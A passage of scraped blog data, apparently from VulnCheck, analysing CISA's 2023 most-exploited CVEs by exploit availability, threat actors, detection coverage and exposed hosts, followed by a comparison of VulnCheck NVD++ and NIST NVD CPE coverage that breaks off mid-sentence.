.sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .s94S9, html code.shiki .s94S9{--shiki-light:#90A4AE;--shiki-default:#E36209;--shiki-dark:#FFAB70;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":61394},[61395,61396,61397,61398,61399],{"id":61022,"depth":220,"text":61023},{"id":61030,"depth":220,"text":61031},{"id":61343,"depth":220,"text":61344},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2024-11-26","VulnCheck discovers evidence that ProjectSend has been exploited in the wild and assigns CVE-2024-11680",{"slug":61403},"projectsend-exploited-itw","\u002Fblog\u002Fprojectsend-exploited-itw",{"title":36637,"description":61401},"blog\u002Fprojectsend-exploited-itw",[242,1281,23275,1279],"FfI1Y-zck4-gF82K8cK6kX_mdlHKdPibrzh36aVAhPs",{"id":61410,"title":61411,"articles":61412,"authors":61452,"body":61454,"date":61416,"description":57889,"extension":234,"image":7,"link":7,"meta":62297,"navigation":237,"path":62299,"seo":62300,"series":7,"stem":62301,"subtype":7,"tags":62302,"__hash__":62303},"blog\u002Fblog\u002Fcisa-top-exploited-2024.md","Exploring CISA’s 2023 Top Routinely Exploited Vulnerabilities",[61413,61417,61419,61421,61423,61425,61427,61429,61431,61434,61439,61442,61445,61448],{"title":61414,"source":19479,"link":61415,"date":61416},"Zero Days Top Cybersecurity Agencies' Most-Exploited List","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884","2024-11-22",{"title":61414,"source":32210,"link":61418,"date":61416},"https:\u002F\u002Fwww.careersinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32213,"link":61420,"date":61416},"https:\u002F\u002Fwww.cuinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32216,"link":61422,"date":61416},"https:\u002F\u002Fwww.databreachtoday.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32219,"link":61424,"date":61416},"https:\u002F\u002Fwww.fraudtoday.io\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32222,"link":61426,"date":61416},"https:\u002F\u002Fwww.govinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32225,"link":61428,"date":61416},"https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61414,"source":32228,"link":61430,"date":61416},"https:\u002F\u002Fwww.inforisktoday.com\u002Fzero-days-top-cybersecurity-agencies-most-exploited-list-a-26884",{"title":61432,"source":14378,"link":61433,"date":61416},"400,000 Systems Potentially Exposed to 2023’s Most Exploited Flaws","https:\u002F\u002Fwww.securityweek.com\u002F400000-systems-potentially-exposed-to-2023s-most-exploited-flaws\u002F",{"title":61435,"source":61436,"link":61437,"date":61438},"Risky Biz News: Four PR firms are behind a Chinese propaganda network","Risky Biz News","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-four-pr-firms-are-behind-a-chinese-propaganda-network\u002F","2024-11-25",{"title":61440,"source":11233,"link":61441,"date":61438},"More than 400K devices vulnerable to most exploited flaws","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fmore-than-400k-devices-vulnerable-to-most-exploited-flaws",{"title":61443,"source":14382,"link":61444,"date":61400},"CISA Urges Agencies to Patch Critical \"Array Networks\" Flaw Amid Active Attacks","https:\u002F\u002Fthehackernews.com\u002F2024\u002F11\u002Fcisa-urges-agencies-to-patch-critical.html",{"title":61446,"source":11233,"link":61447,"date":60926},"Critical Array Networks flaw added to CISA vulnerabilities catalog","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcritical-array-networks-flaw-added-to-cisa-vulnerabilities-catalog-1",{"title":61449,"source":61450,"link":61451,"date":60948},"CISA Urges Immediate Fix for Critical Array Networks Flaw","CySecurity News","https:\u002F\u002Fwww.cysecurity.news\u002F2024\u002F11\u002Fcisa-urges-immediate-fix-for-critical.html?m=1",[61453],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":61455,"toc":62284},[61456,61459,61462,61464,61481,61485,61488,61493,61496,61504,61508,61511,61515,61523,61527,61530,61533,61539,61542,61545,61548,61601,61605,61608,61611,61629,62154,62158,62161,62266,62270,62273,62275,62277,62279],[18,61457,61458],{},"The CISA top routinely exploited vulnerabilities report is always a good read. While it's pretty late in the year, it offers a unique opportunity to reflect on the previous year’s exploitation trends and understand which vulnerabilities posed the greatest threats in 2023 to government organizations. Each year, the report sparks questions about why certain vulnerabilities made the list and what makes them particularly significant.",[18,61460,61461],{},"This year, we decided to explore the vulnerabilities that top CISA's list using VulnCheck Intelligence to better understand the impact and threats associated with these vulnerabilities and the detection coverage VulnCheck provides defenders.",[1920,61463,20],{"id":3520},[22,61465,61466,61469,61472,61475,61478],{},[25,61467,61468],{},"Exploit Availability: 14 of 15 CVEs in CISA's 2023 report have 8+ POC exploits; 13 have weaponized exploits, with 5 weaponized before public exploitation.",[25,61470,61471],{},"Threat Actor Activity: 60 named threat actors linked to 13 CVEs; North Korea’s Silent Chollima targeted 9, while Log4j (CVE-2021-44228) remains the most exploited.",[25,61473,61474],{},"Detection Coverage: VulnCheck provides Initial Access artifacts for 12 CVEs, enabling visibility into vulnerable hosts and detection of malicious activity.",[25,61476,61477],{},"Host Exposure: Tens of thousands of potentially vulnerable hosts identified",[25,61479,61480],{},"CISA’s 2023 Top Routinely Exploited Vulnerabilities report seems reasonable with the research we performed that demonstrates clear exploit availability and threat actor activity.",[61,61482,61484],{"id":61483},"exploit-proof-of-conceptspoc-availability","Exploit Proof-of-Concepts(POC) Availability",[18,61486,61487],{},"We already know the vulnerabilities in the report have confirmed exploitation. Next, we thought it would be valuable to examine exploit availability for the CVEs in CISA's report.",[18,61489,61490],{},[68,61491],{"alt":58618,"src":61492,"width":28205},"\u002Fblog\u002Fcisa-top-exploited-2024\u002Fcisa-top-pocs.png",[993,61494,60799],{"id":61495},"exploit-availability",[22,61497,61498,61501],{},[25,61499,61500],{},"14 out of 15 CVEs have 8 or more proof-of-concept (POC) exploits available. (For context, out of all CVEs, only 1,658 have 8 or more POC exploits available signifying a significant threat.)",[25,61502,61503],{},"For these 14 CVEs, at least one POC was accessible before or on the same day the first evidence of exploitation was publicly disclosed.",[993,61505,61507],{"id":61506},"the-exception","The Exception",[18,61509,61510],{},"The primary outlier is the Barracuda Email Security Gateway (ESG) CVE. Caitlin Condon pointed out a POC that was posted by the Rapid7 team which we’ve included. This case stands out because Barracuda effectively EOL’d (end-of-lifed) the device after widespread compromise. It’s a rare example of a vendor deciding to discontinue a product line after significant exploitation.",[993,61512,61514],{"id":61513},"weaponized-exploits","Weaponized Exploits",[22,61516,61517,61520],{},[25,61518,61519],{},"13 out of 15 CVEs have weaponized exploits available.",[25,61521,61522],{},"Of these, 5 weaponized exploits were available before any public evidence of exploitation.",[993,61524,61526],{"id":61525},"what-do-we-mean-by-weaponized-exploits","What Do We Mean by “Weaponized Exploits”?",[18,61528,61529],{},"A weaponized exploit refers to an exploit that is explicitly malicious, such as cases where the exploit is contained within malware (e.g., a malicious Microsoft Word document), or facilitates \"point & click\" exploitation (e.g., works against all or most targets and works reliably, such as exploits in MetaSploit, VulnCheck Initial Access Intelligence, CANVAS, or Core Impact). Additionally, weaponized exploits typically have secondary payloads, droppers, or implants.",[61,61531,45021],{"id":61532},"threat-actor-attribution",[18,61534,61535],{},[68,61536],{"alt":58618,"src":61537,"width":61538},"\u002Fblog\u002Fcisa-top-exploited-2024\u002Fcisa-threat-actors.png",1000,[18,61540,61541],{},"We identified 60 named threat actors associated with at least one of the CVEs in CISA’s 2023 list. 13 out of 15 CVEs in the report have named threat actors tied to them. The two CVEs without a threat actor attributed were associated with OwnCloud GraphAPI and Barracuda ESG. Additionally, we noted five more associations where the origin country was identified, but the specific threat actor was not named which we included in the chart.",[18,61543,61544],{},"Among the threat actors, North Korea’s Silent Chollima stands out, targeting 9 out of 15 CVEs in the report. Not surprisingly, the Log4j CVE (CVE-2021-44228) is associated with the most threat actors overall, with 31 named threat actors linked to its exploitation.",[18,61546,61547],{},"A quick breakdown of threat actor activity by country shows the usual suspects including: China, Russia, Iran, and North Korea with a single threat actor tied to Turkey. Here’s how the number of threat actors stack up by country:",[307,61549,61550,61559],{},[310,61551,61552],{},[313,61553,61554,61556],{},[316,61555,1464],{},[316,61557,61558],{},"# of Threat Actors",[336,61560,61561,61567,61574,61581,61587,61594],{},[313,61562,61563,61565],{},[341,61564,28799],{},[341,61566,36914],{},[313,61568,61569,61572],{},[341,61570,61571],{},"China",[341,61573,28534],{},[313,61575,61576,61579],{},[341,61577,61578],{},"Russia",[341,61580,723],{},[313,61582,61583,61585],{},[341,61584,930],{},[341,61586,37681],{},[313,61588,61589,61592],{},[341,61590,61591],{},"North Korea",[341,61593,491],{},[313,61595,61596,61599],{},[341,61597,61598],{},"Turkey",[341,61600,467],{},[61,61602,61604],{"id":61603},"detecting-exploitation-w-vulncheck-initial-access","Detecting Exploitation w\u002F VulnCheck Initial Access",[18,61606,61607],{},"Out of the 15 CVEs highlighted in CISA's 2023 report, 12 have VulnCheck Initial Access artifacts which demonstrates our commitment to ensuring broad coverage of vulnerabilities that are likely to become or are exploited in the wild. These artifacts provide defenders with visibility into potential vulnerability exposures. They also aid in detecting the malicious use of exploits targeting these vulnerabilities within an organization’s environment.",[18,61609,61610],{},"For each CVE, we provide a range of detection tools including:",[22,61612,61613,61615,61617,61619,61621,61623,61625,61627],{},[25,61614,325],{},[25,61616,59440],{},[25,61618,59443],{},[25,61620,59446],{},[25,61622,59449],{},[25,61624,59452],{},[25,61626,59455],{},[25,61628,59458],{},[307,61630,61631,61658],{},[310,61632,61633],{},[313,61634,61635,61638,61640,61642,61644,61647,61649,61652,61655],{},[316,61636,61637],{},"artifactName",[316,61639,59474],{},[316,61641,242],{},[316,61643,22852],{},[316,61645,61646],{},"versionScanner",[316,61648,59485],{},[316,61650,61651],{},"suricataRule",[316,61653,61654],{},"snortRule",[316,61656,61657],{},"yara",[336,61659,61660,61683,61706,61729,61752,61775,61798,61821,61844,61867,61890,61913,61936,61957,61979,62001,62022,62044,62066,62088,62110,62132],{},[313,61661,61662,61665,61668,61671,61673,61675,61677,61679,61681],{},[341,61663,61664],{},"ManageEngine SAML Transform Code Execution",[341,61666,61667],{},"2023-01-19",[341,61669,61670],{},"CVE-2022-47966",[341,61672,59510],{},[341,61674],{},[341,61676,59510],{},[341,61678,59510],{},[341,61680,59510],{},[341,61682,59510],{},[313,61684,61685,61688,61691,61694,61696,61698,61700,61702,61704],{},[341,61686,61687],{},"PaperCut NG\u002FMF Authentication Bypass and Code Execution",[341,61689,61690],{},"2023-04-24",[341,61692,61693],{},"CVE-2023-27350",[341,61695,59510],{},[341,61697,59510],{},[341,61699,59510],{},[341,61701,59510],{},[341,61703,59510],{},[341,61705],{},[313,61707,61708,61711,61714,61717,61719,61721,61723,61725,61727],{},[341,61709,61710],{},"Progress MOVEit Transfer SQL Injection (guestaccess.aspx)",[341,61712,61713],{},"2023-06-05",[341,61715,61716],{},"CVE-2023-34362",[341,61718,59510],{},[341,61720,59510],{},[341,61722,59510],{},[341,61724,59510],{},[341,61726,59510],{},[341,61728,59510],{},[313,61730,61731,61734,61737,61740,61742,61744,61746,61748,61750],{},[341,61732,61733],{},"Fortigate SSL VPN enc Heap Overflow",[341,61735,61736],{},"2023-07-11",[341,61738,61739],{},"CVE-2023-27997",[341,61741],{},[341,61743],{},[341,61745],{},[341,61747],{},[341,61749],{},[341,61751],{},[313,61753,61754,61757,61760,61763,61765,61767,61769,61771,61773],{},[341,61755,61756],{},"Citrix NetScaler Stack-Based Buffer Overflow",[341,61758,61759],{},"2023-08-14",[341,61761,61762],{},"CVE-2023-3519",[341,61764,59510],{},[341,61766,59510],{},[341,61768,59510],{},[341,61770,59510],{},[341,61772,59510],{},[341,61774,59510],{},[313,61776,61777,61780,61783,61786,61788,61790,61792,61794,61796],{},[341,61778,61779],{},"JetBrains TeamCity Authentication Bypass",[341,61781,61782],{},"2023-09-27",[341,61784,61785],{},"CVE-2023-42793",[341,61787,59510],{},[341,61789,59510],{},[341,61791,59510],{},[341,61793,59510],{},[341,61795,59510],{},[341,61797,59510],{},[313,61799,61800,61803,61806,61809,61811,61813,61815,61817,61819],{},[341,61801,61802],{},"Confluence Setup Reset Vulnerability",[341,61804,61805],{},"2023-10-10",[341,61807,61808],{},"CVE-2023-22515",[341,61810,59510],{},[341,61812,59510],{},[341,61814,59510],{},[341,61816,59510],{},[341,61818,59510],{},[341,61820],{},[313,61822,61823,61826,61829,61832,61834,61836,61838,61840,61842],{},[341,61824,61825],{},"Cisco IOS XE Add Admin User",[341,61827,61828],{},"2023-10-16",[341,61830,61831],{},"CVE-2023-20198",[341,61833,59510],{},[341,61835],{},[341,61837,59510],{},[341,61839,59510],{},[341,61841,59510],{},[341,61843],{},[313,61845,61846,61849,61852,61855,61857,61859,61861,61863,61865],{},[341,61847,61848],{},"Citrix NetScaler Information Disclosure (Memory Leak)",[341,61850,61851],{},"2023-10-25",[341,61853,61854],{},"CVE-2023-4966",[341,61856,59510],{},[341,61858],{},[341,61860,59510],{},[341,61862,59510],{},[341,61864,59510],{},[341,61866],{},[313,61868,61869,61872,61875,61878,61880,61882,61884,61886,61888],{},[341,61870,61871],{},"Cisco IOS XE IPv6 Command Injection",[341,61873,61874],{},"2023-11-02",[341,61876,61877],{},"CVE-2023-20273",[341,61879,59510],{},[341,61881],{},[341,61883,59510],{},[341,61885,59510],{},[341,61887,59510],{},[341,61889],{},[313,61891,61892,61895,61898,61901,61903,61905,61907,61909,61911],{},[341,61893,61894],{},"ownCloud graphapi Information Disclosure",[341,61896,61897],{},"2023-12-06",[341,61899,61900],{},"CVE-2023-49103",[341,61902,59510],{},[341,61904],{},[341,61906,59510],{},[341,61908,59510],{},[341,61910,59510],{},[341,61912],{},[313,61914,61915,61918,61921,61924,61926,61928,61930,61932,61934],{},[341,61916,61917],{},"Apache Skywalking Log4Shell",[341,61919,61920],{},"2023-12-11",[341,61922,61923],{},"CVE-2021-44228",[341,61925],{},[341,61927,59510],{},[341,61929],{},[341,61931],{},[341,61933],{},[341,61935],{},[313,61937,61938,61941,61943,61945,61947,61949,61951,61953,61955],{},[341,61939,61940],{},"ManageEngine ADManager Log4Shell",[341,61942,61920],{},[341,61944,61923],{},[341,61946],{},[341,61948,59510],{},[341,61950],{},[341,61952],{},[341,61954],{},[341,61956],{},[313,61958,61959,61962,61965,61967,61969,61971,61973,61975,61977],{},[341,61960,61961],{},"Apache Struts2 If-Modified-Since Header Log4Shell",[341,61963,61964],{},"2022-11-23",[341,61966,61923],{},[341,61968,59510],{},[341,61970],{},[341,61972,59510],{},[341,61974,59510],{},[341,61976,59510],{},[341,61978,59510],{},[313,61980,61981,61984,61987,61989,61991,61993,61995,61997,61999],{},[341,61982,61983],{},"Apache Struts2 URI Log4Shell",[341,61985,61986],{},"2022-11-25",[341,61988,61923],{},[341,61990,59510],{},[341,61992],{},[341,61994,59510],{},[341,61996,59510],{},[341,61998,59510],{},[341,62000,59510],{},[313,62002,62003,62006,62008,62010,62012,62014,62016,62018,62020],{},[341,62004,62005],{},"Ubiquiti UniFi Controller Authentication Log4Shell",[341,62007,61986],{},[341,62009,61923],{},[341,62011,59510],{},[341,62013,59510],{},[341,62015,59510],{},[341,62017,59510],{},[341,62019,59510],{},[341,62021,59510],{},[313,62023,62024,62027,62030,62032,62034,62036,62038,62040,62042],{},[341,62025,62026],{},"Apache JSPWiki URI Log4Shell",[341,62028,62029],{},"2022-11-28",[341,62031,61923],{},[341,62033,59510],{},[341,62035,59510],{},[341,62037,59510],{},[341,62039,59510],{},[341,62041,59510],{},[341,62043,59510],{},[313,62045,62046,62049,62052,62054,62056,62058,62060,62062,62064],{},[341,62047,62048],{},"Apache OFBiz Visitor Cookie Log4Shell",[341,62050,62051],{},"2022-11-30",[341,62053,61923],{},[341,62055,59510],{},[341,62057,59510],{},[341,62059,59510],{},[341,62061,59510],{},[341,62063,59510],{},[341,62065,59510],{},[313,62067,62068,62071,62074,62076,62078,62080,62082,62084,62086],{},[341,62069,62070],{},"Apache Druid HTTP DELETE Log4Shell",[341,62072,62073],{},"2022-12-01",[341,62075,61923],{},[341,62077,59510],{},[341,62079,59510],{},[341,62081,59510],{},[341,62083,59510],{},[341,62085,59510],{},[341,62087,59510],{},[313,62089,62090,62093,62096,62098,62100,62102,62104,62106,62108],{},[341,62091,62092],{},"Apache James POP3 Authentication Log4Shell",[341,62094,62095],{},"2022-12-02",[341,62097,61923],{},[341,62099,59510],{},[341,62101,59510],{},[341,62103,59510],{},[341,62105,59510],{},[341,62107,59510],{},[341,62109,59510],{},[313,62111,62112,62115,62118,62120,62122,62124,62126,62128,62130],{},[341,62113,62114],{},"Apache James SMTP Mail From Log4Shell",[341,62116,62117],{},"2022-12-05",[341,62119,61923],{},[341,62121,59510],{},[341,62123,59510],{},[341,62125,59510],{},[341,62127,59510],{},[341,62129,59510],{},[341,62131,59510],{},[313,62133,62134,62137,62140,62142,62144,62146,62148,62150,62152],{},[341,62135,62136],{},"Ivanti MobileIron Authentication Log4Shell",[341,62138,62139],{},"2022-12-06",[341,62141,61923],{},[341,62143,59510],{},[341,62145,59510],{},[341,62147,59510],{},[341,62149,59510],{},[341,62151,59510],{},[341,62153],{},[61,62155,62157],{"id":62156},"a-look-into-potentially-vulnerable-hosts","A Look into Potentially Vulnerable Hosts",[18,62159,62160],{},"Taking a step further to see the impact of these vulnerabilities, we looked up potentially vulnerable hosts over a 3-day period in VulnCheck IP Intelligence to see the breadth of potential targets available to threat actors. For vulnerabilities VulnCheck has developed detection artifacts for, VulnCheck measures their potential exposure on the open Internet.",[307,62162,62163,62173],{},[310,62164,62165],{},[313,62166,62167,62170],{},[316,62168,62169],{},"Host Type",[316,62171,62172],{},"Potentially Vulnerable Hosts",[336,62174,62175,62183,62189,62197,62205,62211,62219,62227,62235,62243,62251,62258],{},[313,62176,62177,62180],{},[341,62178,62179],{},"Cisco IOS XE",[341,62181,62182],{},"92277",[313,62184,62185,62187],{},[341,62186,62179],{},[341,62188,62182],{},[313,62190,62191,62194],{},[341,62192,62193],{},"Fortinet FortiOS",[341,62195,62196],{},"199570",[313,62198,62199,62202],{},[341,62200,62201],{},"Citrix Netscaler",[341,62203,62204],{},"24377",[313,62206,62207,62209],{},[341,62208,62201],{},[341,62210,62204],{},[313,62212,62213,62216],{},[341,62214,62215],{},"Apache Log4J",[341,62217,62218],{},"65245",[313,62220,62221,62224],{},[341,62222,62223],{},"Zoho Manage Engine",[341,62225,62226],{},"9213",[313,62228,62229,62232],{},[341,62230,62231],{},"OwnCloud GraphAPI",[341,62233,62234],{},"18086",[313,62236,62237,62240],{},[341,62238,62239],{},"Progress MOVEit",[341,62241,62242],{},"2461",[313,62244,62245,62248],{},[341,62246,62247],{},"JetBrains TeamCity",[341,62249,62250],{},"2004",[313,62252,62253,62255],{},[341,62254,54034],{},[341,62256,62257],{},"3229",[313,62259,62260,62263],{},[341,62261,62262],{},"Papercut NG\u002FMF",[341,62264,62265],{},"1496",[61,62267,62269],{"id":62268},"our-final-thoughts","Our Final Thoughts",[18,62271,62272],{},"CISA’s 2023 Top Routinely Exploited Vulnerabilities Report highlights vulnerabilities that, based on our research, are highly targeted by threat actors. The report provides valuable insights into technologies frequently used within the federal government and commonly targeted. Organizations should evaluate their exposure to these technologies, enhance visibility into potential risks, leverage robust threat intelligence, maintain strong patch management practices, and implement mitigating controls, such as minimizing internet-facing exposure of these devices wherever possible.",[61,62274,202],{"id":201},[18,62276,45062],{},[18,62278,208],{},[18,62280,211,62281,45071],{},[47,62282,216],{"href":214,"rel":62283},[51],{"title":219,"searchDepth":220,"depth":220,"links":62285},[62286,62292,62293,62294,62295,62296],{"id":61483,"depth":220,"text":61484,"children":62287},[62288,62289,62290,62291],{"id":61495,"depth":1266,"text":60799},{"id":61506,"depth":1266,"text":61507},{"id":61513,"depth":1266,"text":61514},{"id":61525,"depth":1266,"text":61526},{"id":61532,"depth":220,"text":45021},{"id":61603,"depth":220,"text":61604},{"id":62156,"depth":220,"text":62157},{"id":62268,"depth":220,"text":62269},{"id":201,"depth":220,"text":202},{"slug":62298},"cisa-top-exploited-2024","\u002Fblog\u002Fcisa-top-exploited-2024",{"title":61411,"description":57889},"blog\u002Fcisa-top-exploited-2024",[23275,1279],"cV5bMymfdPu7fF0GzvNO1vFPPAV254K4p3DVx9uBlhM",{"id":62305,"title":62306,"articles":7,"authors":62307,"body":62309,"date":62469,"description":62317,"extension":234,"image":7,"link":7,"meta":62470,"navigation":237,"path":62472,"seo":62473,"series":7,"stem":62474,"subtype":7,"tags":62475,"__hash__":62476},"blog\u002Fblog\u002Foutpacing-nvd-cpe.md","Outpacing NIST NVD with VulnCheck NVD++",[62308],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":62310,"toc":62457},[62311,62313,62327,62331,62334,62337,62340,62344,62347,62353,62356,62362,62366,62369,62372,62375,62379,62382,62388,62391,62395,62402,62407,62428,62432,62435,62438,62442,62445],[61,62312,20],{"id":3520},[22,62314,62315,62318,62321,62324],{},[25,62316,62317],{},"VulnCheck NVD++ provides CPE for 76.95% of CVEs published in 2024 while NIST NVD only provides CPE for 41.35% of CVEs",[25,62319,62320],{},"On average, VulnCheck NVD++ has CPE four days faster than NVD.",[25,62322,62323],{},"VulnCheck achieves this through extensive automation and monitoring.",[25,62325,62326],{},"VulnCheck NVD++ is available as a free community offering.",[61,62328,62330],{"id":62329},"the-critical-role-of-cpe-in-detecting-vulnerabilities","The Critical Role of CPE in Detecting Vulnerabilities",[18,62332,62333],{},"Common Platform Enumeration (CPE) is a standardized naming system for software, systems, and hardware, making it essential for accurate vulnerability management. By enabling security teams to gain visibility and identify exactly which assets are affected when a vulnerability is disclosed, CPE cuts down response times and improves patching precision. Historically, the cybersecurity industry has relied on the National Institute of Standards and Technology (NIST), the stewards of both the National Vulnerability Database (NVD) and the CPE programs, to publish CPE data alongside Common Vulnerabilities and Exposures (CVE) entries.",[18,62335,62336],{},"For years, the security industry has taken the availability of CPE data for granted, relying on it as a foundational part of cybersecurity infrastructure. That changed abruptly in March 2024, when the NVD stopped publishing CPE data. This unexpected halt created significant disruption across the industry. Countless companies, from vulnerability databases to security software vendors, found themselves scrambling to fill the gap left by the sudden absence of this vital, freely available resource. Without access to consistent, reliable and timely CPE data, these companies struggled to provide their customers with the clear, actionable intelligence they depended on.",[18,62338,62339],{},"In response, VulnCheck stepped in to help. In March 2024, we launched NVD++, an enhanced version of the NVD that includes VulnCheck-generated CPE entries. Designed as a drop-in replacement for the NVD, NVD++ allows organizations to resume providing precise, actionable vulnerability information to their customers. What’s more, VulnCheck offers NVD++ completely free of charge as part of our commitment to supporting the cybersecurity community with reliable and accessible resources.",[61,62341,62343],{"id":62342},"the-nvd-is-back-but-is-it-really","The NVD is Back, But is it Really?",[18,62345,62346],{},"In late May 2024, NVD secured a new contract and returned to processing CVEs and new CPE data started flowing into NVD once more. Yet even with NVD’s return, there is still a gap in coverage and timeliness that is notable, leaving the need for an alternate source for timely and reliable CPE. So let’s take a look at how VulnCheck NVD++ has become the go-to source for timely, reliable and accurate CPE through our community offering, which has continued to grow, mature, and outpace NIST NVD.",[18,62348,62349],{},[68,62350],{":width":10862,"alt":62351,"src":62352},"VulnCheck NVD CPE Comparison","\u002Fblog\u002Foutpacing-nvd-cpe\u002Fvulncheck-cpe.png",[18,62354,62355],{},"This CPE Generation chart by source maps CPE generation by the number of CVEs based on the publish date of the vulnerability. Since VulnCheck started generating CPEs in 2024 you can see the CPE generation has outpaced NVD since they paused processing in mid-February. VulnCheck has generated CPE consistently through automation and now covers 76.95% of CVEs while NIST NVD has only generated CPE for 41.35% of CVEs and is reliant on human analysis.\nTo dive deeper into CPE generation over time, we can compare VulnCheck and NIST NVD CPE generation by day throughout 2024. This provides visibility into which organization generated CPEs in relation to each CVE’s publication date.",[18,62357,62358],{},[68,62359],{":width":10862,"alt":62360,"src":62361},"Annual CPE Comparison","\u002Fblog\u002Foutpacing-nvd-cpe\u002Fcpe-comparison.png",[61,62363,62365],{"id":62364},"how-quickly-is-vulncheck-cpe-available-for-timely-detection","How Quickly is VulnCheck CPE Available for Timely Detection?",[18,62367,62368],{},"While NIST NVD is reliant on human analysis and publishes CPE entries on its own schedule and resource availability, VulnCheck has focused on automating the creation and validation of CPE, often within hours of a vulnerability disclosure. This accelerated timeline allows organizations to respond sooner with precision, helping them outpace their adversaries.",[18,62370,62371],{},"To put this speed advantage of VulnCheck NVD++ to the test, we conducted a four-week study from October 11 to November 8, 2024, comparing the CPE release times of CVEs between VulnCheck NVD++ and NIST NVD. The results confirmed what our users already know: VulnCheck’s accelerated CPE publication provides a critical edge in vulnerability detection.",[18,62373,62374],{},"Over the course of the study, 3,189 CVEs were published, including several CVEs that were disclosed in vendor advisories but not published to MITRE (cve.org). Of these, NVD++ contained CPE for 2,279 CVEs (71.5%) while NIST NVD contained CPE for 1,470 CVEs (46.1%) during the same time period. This shows that over a four-week period, VulnCheck generated CPE for 809 CVEs that NVD has not generated CPE for (a rate of 28 more CVE covered per day).",[993,62376,62378],{"id":62377},"accelerating-the-time-to-detection-ahead-of-nist-nvd","Accelerating the Time to Detection Ahead of NIST NVD",[18,62380,62381],{},"Our case study also helped us put a number on how much faster NVD++ receives CPE. In the 997 instances where NVD++ contained CPE and NIST NVD eventually added CPE too, VulnCheck, on average, generated CPE more than 96 hours faster than NVD.",[18,62383,62384],{},[68,62385],{":width":10862,"alt":62386,"src":62387},"CNA Breakdown","\u002Fblog\u002Foutpacing-nvd-cpe\u002Fcpe-days-faster.png",[18,62389,62390],{},"A four-day time gap provides defenders with a significant advantage in gaining visibility into their vulnerabilities faster. This can even play out on the shorter end of the time scale. For example, CVE-2024-4757, affecting Fortinet ForitManager, was published on October 23, 2024, and added to CISA KEV on the same day. VulnCheck NVD++ has CPE hours after disclosure but NIST NVD lagged behind by 24 hours - very crucial hours for a vulnerability being actively exploited in the wild.",[61,62392,62394],{"id":62393},"what-we-know-about-the-cves-without-cpe-in-nvd","What We Know About the CVEs without CPE in NVD++",[18,62396,62397,62398,62401],{},"Of the 910 CVEs that currently have no CPE assigned, many of these CVEs involve WordPress plugins, open-source projects on GitHub, or submissions to MITRE, the 